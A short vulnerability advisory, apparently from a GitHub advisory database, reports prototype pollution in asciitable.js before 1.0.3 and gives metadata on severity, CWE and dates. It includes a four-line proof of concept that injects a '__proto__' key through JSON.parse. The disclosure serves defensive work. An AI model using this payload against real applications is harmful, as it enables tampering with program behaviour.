The package asciitable.js before 1.0.3 is vulnerable to Prototype Pollution via the main function.
var a = require("asciitable.js");
var b = JSON.parse('{"__proto__":{"test":123}}');
a({},b);
console.log({}.test)
{
"severity": "CRITICAL",
"github_reviewed": true,
"cwe_ids": [
"CWE-400"
],
"nvd_published_at": "2021-01-04T12:15:00Z",
"github_reviewed_at": "2021-04-06T23:32:45Z"
}